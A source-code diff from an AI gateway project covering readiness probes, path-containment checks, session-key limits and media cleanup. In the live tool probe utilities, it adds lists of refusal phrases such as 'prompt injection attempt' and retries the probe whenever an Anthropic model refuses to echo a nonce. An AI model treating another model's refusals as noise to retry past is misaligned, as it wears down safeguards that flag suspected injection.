shouldRetryExecReadProbe({ text: "read[object Object]", nonce: "nonce-c", + provider: "openai", attempt: 0, maxAttempts: 3, }), @@ -124,6 +172,7 @@ describe("live tool probe utils", () => { shouldRetryExecReadProbe({ text: "read[object Object]", nonce: "nonce-c", + provider: "openai", attempt: 2, maxAttempts: 3, }), @@ -135,9 +184,22 @@ describe("live tool probe utils", () => { shouldRetryExecReadProbe({ text: "nonce-c", nonce: "nonce-c", + provider: "openai", attempt: 0, maxAttempts: 3, }), ).toBe(false); }); + + it("retries anthropic exec+read nonce refusal output", () => { + expect( + shouldRetryExecReadProbe({ + text: "No part of the system asks me to parrot back nonce values.", + nonce: "nonce-c", + provider: "anthropic", + attempt: 0, + maxAttempts: 3, + }), + ).toBe(true); + }); }); diff --git a/src/gateway/live-tool-probe-utils.ts b/src/gateway/live-tool-probe-utils.ts index 3e450ef530d..62b618fe24d 100644 --- a/src/gateway/live-tool-probe-utils.ts +++ b/src/gateway/live-tool-probe-utils.ts @@ -6,6 +6,44 @@ export function hasExpectedSingleNonce(text: string, nonce: string): boolean { return text.includes(nonce); } +const NONCE_REFUSAL_MARKERS = [ + "token", + "secret", + "local file", + "uuid-named file", + "uuid named file", + "parrot back", + "disclose", + "can't help", + "can’t help", + "cannot help", + "can't comply", + "can’t comply", + "cannot comply", + "isn't a real openclaw probe", + "is not a real openclaw probe", + "not a real openclaw probe", + "no part of the system asks me", +]; + +const PROBE_REFUSAL_MARKERS = [ + "prompt injection attempt", + "not a legitimate self-test", + "not legitimate self-test", + "authorized integration probe", +]; + +export function isLikelyToolNonceRefusal(text: string): boolean { + const lower = text.toLowerCase(); + if (PROBE_REFUSAL_MARKERS.some((marker) => lower.includes(marker))) { + return true; + } + if (lower.includes("nonce")) { + return NONCE_REFUSAL_MARKERS.some((marker) => lower.includes(marker)); + } + return false; +} + function hasMalformedToolOutput(text: string): boolean { const trimmed = text.trim(); if (!trimmed) { @@ -38,6 +76,9 @@ export function shouldRetryToolReadProbe(params: { if (hasMalformedToolOutput(params.text)) { return true; } + if (params.provider === "anthropic" && isLikelyToolNonceRefusal(params.text)) { + return true; + } const lower = params.text.trim().toLowerCase(); if (params.provider === "mistral" && (lower.includes("noncea=") || lower.includes("nonceb="))) { return true; @@ -48,6 +89,7 @@ export function shouldRetryToolReadProbe(params: { export function shouldRetryExecReadProbe(params: { text: string; nonce: string; + provider: string; attempt: number; maxAttempts: number; }): boolean { @@ -57,5 +99,8 @@ export function shouldRetryExecReadProbe(params: { if (hasExpectedSingleNonce(params.text, params.nonce)) { return false; } + if (params.provider === "anthropic" && isLikelyToolNonceRefusal(params.text)) { + return true; + } return hasMalformedToolOutput(params.text); } diff --git a/src/gateway/openai-http.message-channel.test.ts b/src/gateway/openai-http.message-channel.test.ts index 153570bdf08..3c602cbac18 100644 --- a/src/gateway/openai-http.message-channel.test.ts +++ b/src/gateway/openai-http.message-channel.test.ts @@ -3,77 +3,57 @@ import { agentCommand, installGatewayTestHooks, withGatewayServer } from "./test installGatewayTestHooks({ scope: "test" }); +const OPENAI_SERVER_OPTIONS = { + host: "127.0.0.1", + auth: { mode: "token" as const, token: "secret" }, + controlUiEnabled: false, + openAiChatCompletionsEnabled: true, +}; + +async function runOpenAiMessageChannelRequest(params?: { messageChannelHeader?: string }) { + agentCommand.mockReset(); + agentCommand.mockResolvedValueOnce({ payloads: [{ text: "ok" }] } as never); + + let firstCall: { messageChannel?: string } | undefined; + await withGatewayServer( + async ({ port }) => { + const headers: Record = { + "content-type": "application/json", + authorization: "Bearer secret", + }; + if (params?.messageChannelHeader) { + headers["x-openclaw-message-channel"] = params.messageChannelHeader; + } + const res = await fetch(`http://127.0.0.1:${port}/v1/chat/completions`, { + method: "POST", + headers, + body: JSON.stringify({ + model: "openclaw", + messages: [{ role: "user", content: "hi" }], + }), + }); + + expect(res.status).toBe(200); + firstCall = (agentCommand.mock.calls[0] as unknown[] | undefined)?.[0] as + | { messageChannel?: string } + | undefined; + await res.text(); + }, + { serverOptions: OPENAI_SERVER_OPTIONS }, + ); + return firstCall; +} + describe("OpenAI HTTP message channel", () => { it("passes x-openclaw-message-channel through to agentCommand", async () => { - agentCommand.mockReset(); - agentCommand.mockResolvedValueOnce({ payloads: [{ text: "ok" }] } as never); - - await withGatewayServer( - async ({ port }) => { - const res = await fetch(`http://127.0.0.1:${port}/v1/chat/completions`, { - method: "POST", - headers: { - "content-type": "application/json", - authorization: "Bearer secret", - "x-openclaw-message-channel": "custom-client-channel", - }, - body: JSON.stringify({ - model: "openclaw", - messages: [{ role: "user", content: "hi" }], - }), - }); - - expect(res.status).toBe(200); - const firstCall = (agentCommand.mock.calls[0] as unknown[] | undefined)?.[0] as - | { messageChannel?: string } - | undefined; - expect(firstCall?.messageChannel).toBe("custom-client-channel"); - await res.text(); - }, - { - serverOptions: { - host: "127.0.0.1", - auth: { mode: "token", token: "secret" }, - controlUiEnabled: false, - openAiChatCompletionsEnabled: true, - }, - }, - ); + const firstCall = await runOpenAiMessageChannelRequest({ + messageChannelHeader: "custom-client-channel", + }); + expect(firstCall?.messageChannel).toBe("custom-client-channel"); }); it("defaults messageChannel to webchat when header is absent", async () => { - agentCommand.mockReset(); - agentCommand.mockResolvedValueOnce({ payloads: [{ text: "ok" }] } as never); - - await withGatewayServer( - async ({ port }) => { - const res = await fetch(`http://127.0.0.1:${port}/v1/chat/completions`, { - method: "POST", - headers: { - "content-type": "application/json", - authorization: "Bearer secret", - }, - body: JSON.stringify({ - model: "openclaw", - messages: [{ role: "user", content: "hi" }], - }), - }); - - expect(res.status).toBe(200); - const firstCall = (agentCommand.mock.calls[0] as unknown[] | undefined)?.[0] as - | { messageChannel?: string } - | undefined; - expect(firstCall?.messageChannel).toBe("webchat"); - await res.text(); - }, - { - serverOptions: { - host: "127.0.0.1", - auth: { mode: "token", token: "secret" }, - controlUiEnabled: false, - openAiChatCompletionsEnabled: true, - }, - }, - ); + const firstCall = await runOpenAiMessageChannelRequest(); + expect(firstCall?.messageChannel).toBe("webchat"); }); }); diff --git a/src/gateway/protocol/connect-error-details.ts b/src/gateway/protocol/connect-error-details.ts index 62286092671..442e8f2c54d 100644 --- a/src/gateway/protocol/connect-error-details.ts +++ b/src/gateway/protocol/connect-error-details.ts @@ -4,9 +4,9 @@ export const ConnectErrorDetailCodes = { AUTH_TOKEN_MISSING: "AUTH_TOKEN_MISSING", AUTH_TOKEN_MISMATCH: "AUTH_TOKEN_MISMATCH", AUTH_TOKEN_NOT_CONFIGURED: "AUTH_TOKEN_NOT_CONFIGURED", - AUTH_PASSWORD_MISSING: "AUTH_PASSWORD_MISSING", - AUTH_PASSWORD_MISMATCH: "AUTH_PASSWORD_MISMATCH", - AUTH_PASSWORD_NOT_CONFIGURED: "AUTH_PASSWORD_NOT_CONFIGURED", + AUTH_PASSWORD_MISSING: "AUTH_PASSWORD_MISSING", // pragma: allowlist secret + AUTH_PASSWORD_MISMATCH: "AUTH_PASSWORD_MISMATCH", // pragma: allowlist secret + AUTH_PASSWORD_NOT_CONFIGURED: "AUTH_PASSWORD_NOT_CONFIGURED", // pragma: allowlist secret AUTH_DEVICE_TOKEN_MISMATCH: "AUTH_DEVICE_TOKEN_MISMATCH", AUTH_RATE_LIMITED: "AUTH_RATE_LIMITED", AUTH_TAILSCALE_IDENTITY_MISSING: "AUTH_TAILSCALE_IDENTITY_MISSING", diff --git a/src/gateway/protocol/schema/logs-chat.ts b/src/gateway/protocol/schema/logs-chat.ts index b8d0fe1ba45..ffa01945c01 100644 --- a/src/gateway/protocol/schema/logs-chat.ts +++ b/src/gateway/protocol/schema/logs-chat.ts @@ -1,5 +1,5 @@ import { Type } from "@sinclair/typebox"; -import { NonEmptyString } from "./primitives.js"; +import { ChatSendSessionKeyString, NonEmptyString } from "./primitives.js"; export const LogsTailParamsSchema = Type.Object( { @@ -33,7 +33,7 @@ export const ChatHistoryParamsSchema = Type.Object( export const ChatSendParamsSchema = Type.Object( { - sessionKey: NonEmptyString, + sessionKey: ChatSendSessionKeyString, message: Type.String(), thinking: Type.Optional(Type.String()), deliver: Type.Optional(Type.Boolean()), diff --git a/src/gateway/protocol/schema/primitives.ts b/src/gateway/protocol/schema/primitives.ts index d43a16a1ed1..849778149e1 100644 --- a/src/gateway/protocol/schema/primitives.ts +++ b/src/gateway/protocol/schema/primitives.ts @@ -3,6 +3,11 @@ import { SESSION_LABEL_MAX_LENGTH } from "../../../sessions/session-label.js"; import { GATEWAY_CLIENT_IDS, GATEWAY_CLIENT_MODES } from "../client-info.js"; export const NonEmptyString = Type.String({ minLength: 1 }); +export const CHAT_SEND_SESSION_KEY_MAX_LENGTH = 512; +export const ChatSendSessionKeyString = Type.String({ + minLength: 1, + maxLength: CHAT_SEND_SESSION_KEY_MAX_LENGTH, +}); export const SessionLabelString = Type.String({ minLength: 1, maxLength: SESSION_LABEL_MAX_LENGTH, diff --git a/src/gateway/resolve-configured-secret-input-string.ts b/src/gateway/resolve-configured-secret-input-string.ts index c83354aa9dd..e698b09910c 100644 --- a/src/gateway/resolve-configured-secret-input-string.ts +++ b/src/gateway/resolve-configured-secret-input-string.ts @@ -3,7 +3,7 @@ import { resolveSecretInputRef } from "../config/types.secrets.js"; import { secretRefKey } from "../secrets/ref-contract.js"; import { resolveSecretRefValues } from "../secrets/resolve.js"; -export type SecretInputUnresolvedReasonStyle = "generic" | "detailed"; +export type SecretInputUnresolvedReasonStyle = "generic" | "detailed"; // pragma: allowlist secret function trimToUndefined(value: unknown): string | undefined { if (typeof value !== "string") { diff --git a/src/gateway/server-channels.ts b/src/gateway/server-channels.ts index 6c291541369..4090791d285 100644 --- a/src/gateway/server-channels.ts +++ b/src/gateway/server-channels.ts @@ -180,6 +180,7 @@ export function createChannelManager(opts: ChannelManagerOptions): ChannelManage enabled: false, configured: true, running: false, + restartPending: false, lastError: plugin.config.disabledReason?.(account, cfg) ?? "disabled", }); return; @@ -195,6 +196,7 @@ export function createChannelManager(opts: ChannelManagerOptions): ChannelManage enabled: true, configured: false, running: false, + restartPending: false, lastError: plugin.config.unconfiguredReason?.(account, cfg) ?? "not configured", }); return; @@ -215,6 +217,7 @@ export function createChannelManager(opts: ChannelManagerOptions): ChannelManage enabled: true, configured: true, running: true, + restartPending: false, lastStartAt: Date.now(), lastError: null, reconnectAttempts: preserveRestartAttempts ? (restartAttempts.get(rKey) ?? 0) : 0, @@ -252,6 +255,11 @@ export function createChannelManager(opts: ChannelManagerOptions): ChannelManage const attempt = (restartAttempts.get(rKey) ?? 0) + 1; restartAttempts.set(rKey, attempt); if (attempt > MAX_RESTART_ATTEMPTS) { + setRuntime(channelId, id, { + accountId: id, + restartPending: false, + reconnectAttempts: attempt, + }); log.error?.(`[${id}] giving up after ${MAX_RESTART_ATTEMPTS} restart attempts`); return; } @@ -261,6 +269,7 @@ export function createChannelManager(opts: ChannelManagerOptions): ChannelManage ); setRuntime(channelId, id, { accountId: id, + restartPending: true, reconnectAttempts: attempt, }); try { @@ -349,6 +358,7 @@ export function createChannelManager(opts: ChannelManagerOptions): ChannelManage setRuntime(channelId, id, { accountId: id, running: false, + restartPending: false, lastStopAt: Date.now(), }); }), @@ -377,6 +387,7 @@ export function createChannelManager(opts: ChannelManagerOptions): ChannelManage const next: ChannelAccountSnapshot = { accountId: resolvedId, running: false, + restartPending: false, lastError: cleared ? "logged out" : current.lastError, }; if (typeof current.connected === "boolean") { diff --git a/src/gateway/server-close.ts b/src/gateway/server-close.ts index 635f830b5e2..1d941c0e206 100644 --- a/src/gateway/server-close.ts +++ b/src/gateway/server-close.ts @@ -21,6 +21,7 @@ export function createGatewayCloseHandler(params: { tickInterval: ReturnType; healthInterval: ReturnType; dedupeCleanup: ReturnType; + mediaCleanup: ReturnType | null; agentUnsub: (() => void) | null; heartbeatUnsub: (() => void) | null; chatRunState: { clear: () => void }; @@ -87,6 +88,9 @@ export function createGatewayCloseHandler(params: { clearInterval(params.tickInterval); clearInterval(params.healthInterval); clearInterval(params.dedupeCleanup); + if (params.mediaCleanup) { + clearInterval(params.mediaCleanup); + } if (params.agentUnsub) { try { params.agentUnsub(); diff --git a/src/gateway/server-http.probe.test.ts b/src/gateway/server-http.probe.test.ts new file mode 100644 index 00000000000..0e55ddeba32 --- /dev/null +++ b/src/gateway/server-http.probe.test.ts @@ -0,0 +1,155 @@ +import { describe, expect, it } from "vitest"; +import { + AUTH_TOKEN, + AUTH_NONE, + createRequest, + createResponse, + dispatchRequest, + withGatewayServer, +} from "./server-http.test-harness.js"; +import type { ReadinessChecker } from "./server/readiness.js"; + +describe("gateway probe endpoints", () => { + it("returns detailed readiness payload for local /ready requests", async () => { + const getReadiness: ReadinessChecker = () => ({ + ready: true, + failing: [], + uptimeMs: 45_000, + }); + + await withGatewayServer({ + prefix: "probe-ready", + resolvedAuth: AUTH_NONE, + overrides: { getReadiness }, + run: async (server) => { + const req = createRequest({ path: "/ready" }); + const { res, getBody } = createResponse(); + await dispatchRequest(server, req, res); + + expect(res.statusCode).toBe(200); + expect(JSON.parse(getBody())).toEqual({ ready: true, failing: [], uptimeMs: 45_000 }); + }, + }); + }); + + it("returns only readiness state for unauthenticated remote /ready requests", async () => { + const getReadiness: ReadinessChecker = () => ({ + ready: false, + failing: ["discord", "telegram"], + uptimeMs: 8_000, + }); + + await withGatewayServer({ + prefix: "probe-not-ready", + resolvedAuth: AUTH_NONE, + overrides: { getReadiness }, + run: async (server) => { + const req = createRequest({ + path: "/ready", + remoteAddress: "10.0.0.8", + host: "gateway.test", + }); + const { res, getBody } = createResponse(); + await dispatchRequest(server, req, res); + + expect(res.statusCode).toBe(503); + expect(JSON.parse(getBody())).toEqual({ ready: false }); + }, + }); + }); + + it("returns detailed readiness payload for authenticated remote /ready requests", async () => { + const getReadiness: ReadinessChecker = () => ({ + ready: false, + failing: ["discord", "telegram"], + uptimeMs: 8_000, + }); + + await withGatewayServer({ + prefix: "probe-remote-authenticated", + resolvedAuth: AUTH_TOKEN, + overrides: { getReadiness }, + run: async (server) => { + const req = createRequest({ + path: "/ready", + remoteAddress: "10.0.0.8", + host: "gateway.test", + authorization: "Bearer test-token", + }); + const { res, getBody } = createResponse(); + await dispatchRequest(server, req, res); + + expect(res.statusCode).toBe(503); + expect(JSON.parse(getBody())).toEqual({ + ready: false, + failing: ["discord", "telegram"], + uptimeMs: 8_000, + }); + }, + }); + }); + + it("returns typed internal error payload when readiness evaluation throws", async () => { + const getReadiness: ReadinessChecker = () => { + throw new Error("boom"); + }; + + await withGatewayServer({ + prefix: "probe-throws", + resolvedAuth: AUTH_NONE, + overrides: { getReadiness }, + run: async (server) => { + const req = createRequest({ path: "/ready" }); + const { res, getBody } = createResponse(); + await dispatchRequest(server, req, res); + + expect(res.statusCode).toBe(503); + expect(JSON.parse(getBody())).toEqual({ ready: false, failing: ["internal"], uptimeMs: 0 }); + }, + }); + }); + + it("keeps /healthz shallow even when readiness checker reports failing channels", async () => { + const getReadiness: ReadinessChecker = () => ({ + ready: false, + failing: ["discord"], + uptimeMs: 999, + }); + + await withGatewayServer({ + prefix: "probe-healthz-unaffected", + resolvedAuth: AUTH_NONE, + overrides: { getReadiness }, + run: async (server) => { + const req = createRequest({ path: "/healthz" }); + const { res, getBody } = createResponse(); + await dispatchRequest(server, req, res); + + expect(res.statusCode).toBe(200); + expect(getBody()).toBe(JSON.stringify({ ok: true, status: "live" })); + }, + }); + }); + + it("reflects readiness status on HEAD /readyz without a response body", async () => { + const getReadiness: ReadinessChecker = () => ({ + ready: false, + failing: ["discord"], + uptimeMs: 5_000, + }); + + await withGatewayServer({ + prefix: "probe-readyz-head", + resolvedAuth: AUTH_NONE, + overrides: { getReadiness }, + run: async (server) => { + const req = createRequest({ path: "/readyz", method: "HEAD" }); + const { res, getBody } = createResponse(); + await dispatchRequest(server, req, res); + + expect(res.statusCode).toBe(503); + expect(getBody()).toBe(""); + }, + }); + }); +}); diff --git a/src/gateway/server-http.test-harness.ts b/src/gateway/server-http.test-harness.ts index bf963487038..24612d60b1f 100644 --- a/src/gateway/server-http.test-harness.ts +++ b/src/gateway/server-http.test-harness.ts @@ -28,11 +28,15 @@ export function createRequest(params: { path: string; authorization?: string; method?: string; + remoteAddress?: string; + host?: string; }): IncomingMessage { return createGatewayRequest({ path: params.path, authorization: params.authorization, method: params.method, + remoteAddress: params.remoteAddress, + host: params.host, }); } @@ -127,6 +131,8 @@ export async function sendRequest( path: string; authorization?: string; method?: string; + remoteAddress?: string; + host?: string; }, ): Promise> { const response = createResponse(); diff --git a/src/gateway/server-http.ts b/src/gateway/server-http.ts index 41911f35b49..612ce90dbba 100644 --- a/src/gateway/server-http.ts +++ b/src/gateway/server-http.ts @@ -20,7 +20,12 @@ import { normalizeRateLimitClientIp, type AuthRateLimiter, } from "./auth-rate-limit.js"; -import { type GatewayAuthResult, type ResolvedGatewayAuth } from "./auth.js"; +import { + authorizeHttpGatewayConnect, + isLocalDirectRequest, + type GatewayAuthResult, + type ResolvedGatewayAuth, +} from "./auth.js"; import { normalizeCanvasScopedUrl } from "./canvas-capability.js"; import { handleControlUiAvatarRequest, @@ -46,6 +51,7 @@ import { resolveHookDeliver, } from "./hooks.js"; import { sendGatewayAuthFailure, setDefaultSecurityHeaders } from "./http-common.js"; +import { getBearerToken } from "./http-utils.js"; import { handleOpenAiHttpRequest } from "./openai-http.js"; import { handleOpenResponsesHttpRequest } from "./openresponses-http.js"; import { @@ -59,6 +65,7 @@ import { type PluginHttpRequestHandler, type PluginRoutePathContext, } from "./server/plugins-http.js"; +import type { ReadinessChecker } from "./server/readiness.js"; import type { GatewayWsClient } from "./server/ws-types.js"; import { handleToolsInvokeHttpRequest } from "./tools-invoke-http.js"; @@ -150,11 +157,39 @@ function shouldEnforceDefaultPluginGatewayAuth(pathContext: PluginRoutePathConte ); } -function handleGatewayProbeRequest( +async function canRevealReadinessDetails(params: { + req: IncomingMessage; + resolvedAuth: ResolvedGatewayAuth; + trustedProxies: string[]; + allowRealIpFallback: boolean; +}): Promise { + if (isLocalDirectRequest(params.req, params.trustedProxies, params.allowRealIpFallback)) { + return true; + } + if (params.resolvedAuth.mode === "none") { + return false; + } + + const bearerToken = getBearerToken(params.req); + const authResult = await authorizeHttpGatewayConnect({ + auth: params.resolvedAuth, + connectAuth: bearerToken ? { token: bearerToken, password: bearerToken } : null, + req: params.req, + trustedProxies: params.trustedProxies, + allowRealIpFallback: params.allowRealIpFallback, + }); + return authResult.ok; +} + +async function handleGatewayProbeRequest( req: IncomingMessage, res: ServerResponse, requestPath: string, -): boolean { + resolvedAuth: ResolvedGatewayAuth, + trustedProxies: string[], + allowRealIpFallback: boolean, + getReadiness?: ReadinessChecker, +): Promise { const status = GATEWAY_PROBE_STATUS_BY_PATH.get(requestPath); if (!status) { return false; @@ -169,14 +204,34 @@ function handleGatewayProbeRequest( return true; } - res.statusCode = 200; res.setHeader("Content-Type", "application/json; charset=utf-8"); res.setHeader("Cache-Control", "no-store"); - if (method === "HEAD") { - res.end(); - return true; + + let statusCode: number; + let body: string; + if (status === "ready" && getReadiness) { + const includeDetails = await canRevealReadinessDetails({ + req, + resolvedAuth, + trustedProxies, + allowRealIpFallback, + }); + try { + const result = getReadiness(); + statusCode = result.ready ? 200 : 503; + body = JSON.stringify(includeDetails ? result : { ready: result.ready }); + } catch { + statusCode = 503; + body = JSON.stringify( + includeDetails ? { ready: false, failing: ["internal"], uptimeMs: 0 } : { ready: false }, + ); + } + } else { + statusCode = 200; + body = JSON.stringify({ ok: true, status }); } - res.end(JSON.stringify({ ok: true, status })); + res.statusCode = statusCode; + res.end(method === "HEAD" ? undefined : body); return true; } @@ -519,6 +574,7 @@ export function createGatewayHttpServer(opts: { resolvedAuth: ResolvedGatewayAuth; /** Optional rate limiter for auth brute-force protection. */ rateLimiter?: AuthRateLimiter; + getReadiness?: ReadinessChecker; tlsOptions?: TlsOptions; }): HttpServer { const { @@ -537,6 +593,7 @@ export function createGatewayHttpServer(opts: { shouldEnforcePluginGatewayAuth, resolvedAuth, rateLimiter, + getReadiness, } = opts; const httpServer: HttpServer = opts.tlsOptions ? createHttpsServer(opts.tlsOptions, (req, res) => { @@ -693,7 +750,16 @@ export function createGatewayHttpServer(opts: { requestStages.push({ name: "gateway-probes", - run: () => handleGatewayProbeRequest(req, res, requestPath), + run: () => + handleGatewayProbeRequest( + req, + res, + requestPath, + resolvedAuth, + trustedProxies, + allowRealIpFallback, + getReadiness, + ), }); if (await runGatewayHttpRequestStages(requestStages)) { diff --git a/src/gateway/server-maintenance.test.ts b/src/gateway/server-maintenance.test.ts new file mode 100644 index 00000000000..4976a34470e --- /dev/null +++ b/src/gateway/server-maintenance.test.ts @@ -0,0 +1,142 @@ +import { afterEach, describe, expect, it, vi } from "vitest"; +import type { HealthSummary } from "../commands/health.js"; + +const cleanOldMediaMock = vi.fn(async () => {}); + +vi.mock("../media/store.js", async (importOriginal) => { + const actual = await importOriginal(); + return { + ...actual, + cleanOldMedia: cleanOldMediaMock, + }; +}); + +describe("startGatewayMaintenanceTimers", () => { + afterEach(() => { + vi.useRealTimers(); + vi.clearAllMocks(); + }); + + it("does not schedule recursive media cleanup unless ttl is configured", async () => { + vi.useFakeTimers(); + const { startGatewayMaintenanceTimers } = await import("./server-maintenance.js"); + + const timers = startGatewayMaintenanceTimers({ + broadcast: () => {}, + nodeSendToAllSubscribed: () => {}, + getPresenceVersion: () => 1, + getHealthVersion: () => 1, + refreshGatewayHealthSnapshot: async () => ({ ok: true }) as HealthSummary, + logHealth: { error: () => {} }, + dedupe: new Map(), + chatAbortControllers: new Map(), + chatRunState: { abortedRuns: new Map() }, + chatRunBuffers: new Map(), + chatDeltaSentAt: new Map(), + removeChatRun: () => undefined, + agentRunSeq: new Map(), + nodeSendToSession: () => {}, + }); + + expect(cleanOldMediaMock).not.toHaveBeenCalled(); + expect(timers.mediaCleanup).toBeNull(); + + clearInterval(timers.tickInterval); + clearInterval(timers.healthInterval); + clearInterval(timers.dedupeCleanup); + }); + + it("runs startup media cleanup and repeats it hourly", async () => { + vi.useFakeTimers(); + const { startGatewayMaintenanceTimers } = await import("./server-maintenance.js"); + + const timers = startGatewayMaintenanceTimers({ + broadcast: () => {}, + nodeSendToAllSubscribed: () => {}, + getPresenceVersion: () => 1, + getHealthVersion: () => 1, + refreshGatewayHealthSnapshot: async () => ({ ok: true }) as HealthSummary, + logHealth: { error: () => {} }, + dedupe: new Map(), + chatAbortControllers: new Map(), + chatRunState: { abortedRuns: new Map() }, + chatRunBuffers: new Map(), + chatDeltaSentAt: new Map(), + removeChatRun: () => undefined, + agentRunSeq: new Map(), + nodeSendToSession: () => {}, + mediaCleanupTtlMs: 24 * 60 * 60_000, + }); + + expect(cleanOldMediaMock).toHaveBeenCalledWith(24 * 60 * 60_000, { + recursive: true, + pruneEmptyDirs: true, + }); + + cleanOldMediaMock.mockClear(); + await vi.advanceTimersByTimeAsync(60 * 60_000); + expect(cleanOldMediaMock).toHaveBeenCalledWith(24 * 60 * 60_000, { + recursive: true, + pruneEmptyDirs: true, + }); + + clearInterval(timers.tickInterval); + clearInterval(timers.healthInterval); + clearInterval(timers.dedupeCleanup); + if (timers.mediaCleanup) { + clearInterval(timers.mediaCleanup); + } + }); + + it("skips overlapping media cleanup runs", async () => { + vi.useFakeTimers(); + let resolveCleanup = () => {}; + let cleanupReady = false; + cleanOldMediaMock.mockImplementation( + () => + new Promise((resolve) => { + resolveCleanup = resolve; + cleanupReady = true; + }), + ); + const { startGatewayMaintenanceTimers } = await import("./server-maintenance.js"); + + const timers = startGatewayMaintenanceTimers({ + broadcast: () => {}, + nodeSendToAllSubscribed: () => {}, + getPresenceVersion: () => 1, + getHealthVersion: () => 1, + refreshGatewayHealthSnapshot: async () => ({ ok: true }) as HealthSummary, + logHealth: { error: () => {} }, + dedupe: new Map(), + chatAbortControllers: new Map(), + chatRunState: { abortedRuns: new Map() }, + chatRunBuffers: new Map(), + chatDeltaSentAt: new Map(), + removeChatRun: () => undefined, + agentRunSeq: new Map(), + nodeSendToSession: () => {}, + mediaCleanupTtlMs: 24 * 60 * 60_000, + }); + + expect(cleanOldMediaMock).toHaveBeenCalledTimes(1); + + await vi.advanceTimersByTimeAsync(60 * 60_000); + expect(cleanOldMediaMock).toHaveBeenCalledTimes(1); + + if (cleanupReady) { + resolveCleanup(); + } + await Promise.resolve(); + + await vi.advanceTimersByTimeAsync(60 * 60_000); + expect(cleanOldMediaMock).toHaveBeenCalledTimes(2); + + clearInterval(timers.tickInterval); + clearInterval(timers.healthInterval); + clearInterval(timers.dedupeCleanup); + if (timers.mediaCleanup) { + clearInterval(timers.mediaCleanup); + } + }); +}); diff --git a/src/gateway/server-maintenance.ts b/src/gateway/server-maintenance.ts index a93c7995138..581e0d43ec3 100644 --- a/src/gateway/server-maintenance.ts +++ b/src/gateway/server-maintenance.ts @@ -1,4 +1,5 @@ import type { HealthSummary } from "../commands/health.js"; +import { cleanOldMedia } from "../media/store.js"; import { abortChatRunById, type ChatAbortControllerEntry } from "./chat-abort.js"; import type { ChatRunEntry } from "./server-chat.js"; import { @@ -37,10 +38,12 @@ export function startGatewayMaintenanceTimers(params: { ) => ChatRunEntry | undefined; agentRunSeq: Map; nodeSendToSession: (sessionKey: string, event: string, payload: unknown) => void; + mediaCleanupTtlMs?: number; }): { tickInterval: ReturnType; healthInterval: ReturnType; dedupeCleanup: ReturnType; + mediaCleanup: ReturnType | null; } { setBroadcastHealthUpdate((snap: HealthSummary) => { params.broadcast("health", snap, { @@ -129,5 +132,33 @@ export function startGatewayMaintenanceTimers(params: { } }, 60_000); - return { tickInterval, healthInterval, dedupeCleanup }; + if (typeof params.mediaCleanupTtlMs !== "number") { + return { tickInterval, healthInterval, dedupeCleanup, mediaCleanup: null }; + } + + let mediaCleanupInFlight: Promise | null = null; + const runMediaCleanup = () => { + if (mediaCleanupInFlight) { + return mediaCleanupInFlight; + } + mediaCleanupInFlight = cleanOldMedia(params.mediaCleanupTtlMs, { + recursive: true, + pruneEmptyDirs: true, + }) + .catch((err) => { + params.logHealth.error(`media cleanup failed: ${formatError(err)}`); + }) + .finally(() => { + mediaCleanupInFlight = null; + }); + return mediaCleanupInFlight; + }; + + const mediaCleanup = setInterval(() => { + void runMediaCleanup(); + }, 60 * 60_000); + + void runMediaCleanup(); + + return { tickInterval, healthInterval, dedupeCleanup, mediaCleanup }; } diff --git a/src/gateway/server-methods/agents-mutate.test.ts b/src/gateway/server-methods/agents-mutate.test.ts index 66774715eb8..1cd88825b8a 100644 --- a/src/gateway/server-methods/agents-mutate.test.ts +++ b/src/gateway/server-methods/agents-mutate.test.ts @@ -31,6 +31,7 @@ const mocks = vi.hoisted(() => ({ fsLstat: vi.fn(async (..._args: unknown[]) => null as import("node:fs").Stats | null), fsRealpath: vi.fn(async (p: string) => p), fsOpen: vi.fn(async () => ({}) as unknown), + writeFileWithinRoot: vi.fn(async () => {}), })); vi.mock("../../config/config.js", () => ({ @@ -77,6 +78,15 @@ vi.mock("../session-utils.js", () => ({ listAgentsForGateway: mocks.listAgentsForGateway, })); +vi.mock("../../infra/fs-safe.js", async () => { + const actual = + await vi.importActual("../../infra/fs-safe.js"); + return { + ...actual, + writeFileWithinRoot: mocks.writeFileWithinRoot, + }; +}); + // Mock node:fs/promises – agents.ts uses `import fs from "node:fs/promises"` // which resolves to the module namespace default, so we spread actual and // override the methods we need, plus set `default` explicitly. diff --git a/src/gateway/server-methods/agents.ts b/src/gateway/server-methods/agents.ts index 88e362a36d4..b9de9b797aa 100644 --- a/src/gateway/server-methods/agents.ts +++ b/src/gateway/server-methods/agents.ts @@ -732,10 +732,19 @@ export const agentsHandlers: GatewayRequestHandlers = { return; } const content = String(params.content ?? ""); + const relativeWritePath = path.relative(resolvedPath.workspaceReal, resolvedPath.ioPath); + if ( + !relativeWritePath || + relativeWritePath.startsWith("..") || + path.isAbsolute(relativeWritePath) + ) { + respondWorkspaceFileUnsafe(respond, name); + return; + } try { await writeFileWithinRoot({ - rootDir: workspaceDir, - relativePath: name, + rootDir: resolvedPath.workspaceReal, + relativePath: relativeWritePath, data: content, encoding: "utf8", }); diff --git a/src/gateway/server-methods/chat.directive-tags.test.ts b/src/gateway/server-methods/chat.directive-tags.test.ts index d4f631a21ce..717c81337e8 100644 --- a/src/gateway/server-methods/chat.directive-tags.test.ts +++ b/src/gateway/server-methods/chat.directive-tags.test.ts @@ -5,6 +5,8 @@ import { CURRENT_SESSION_VERSION } from "@mariozechner/pi-coding-agent"; import { afterEach, describe, expect, it, vi } from "vitest"; import type { MsgContext } from "../../auto-reply/templating.js"; import { GATEWAY_CLIENT_CAPS, GATEWAY_CLIENT_MODES } from "../protocol/client-info.js"; +import { ErrorCodes } from "../protocol/index.js"; +import { CHAT_SEND_SESSION_KEY_MAX_LENGTH } from "../protocol/schema/primitives.js"; import type { GatewayRequestContext } from "./types.js"; const mockState = vi.hoisted(() => ({ @@ -325,6 +327,34 @@ describe("chat directive tag stripping for non-streaming final payloads", () => expect(extractFirstTextBlock(payload)).toBe(""); }); + it("rejects oversized chat.send session keys before dispatch", async () => { + createTranscriptFixture("openclaw-chat-send-session-key-too-long-"); + const respond = vi.fn(); + const context = createChatContext(); + + await chatHandlers["chat.send"]({ + params: { + sessionKey: `agent:main:${"x".repeat(CHAT_SEND_SESSION_KEY_MAX_LENGTH)}`, + message: "hello", + idempotencyKey: "idem-session-key-too-long", + }, + respond, + req: {} as never, + client: null as never, + isWebchatConnect: () => false, + context: context as GatewayRequestContext, + }); + + expect(respond).toHaveBeenCalledWith( + false, + undefined, + expect.objectContaining({ + code: ErrorCodes.INVALID_REQUEST, + }), + ); + expect(context.broadcast).not.toHaveBeenCalled(); + }); + 